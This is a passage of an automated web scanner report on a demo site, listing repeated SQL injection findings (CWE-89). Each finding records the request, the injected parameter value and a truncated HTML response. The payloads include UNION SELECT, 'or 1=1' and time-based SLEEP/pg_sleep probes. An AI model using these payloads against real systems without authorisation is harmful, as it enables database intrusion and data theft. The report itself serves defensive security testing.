src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #818\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #819\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io''\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #820\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #821\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #822\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #823\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' or 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #824\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #825\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io 1)) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #826\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" OR \"\" = \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #827\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #828\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #829\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' or 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #830Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #831\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 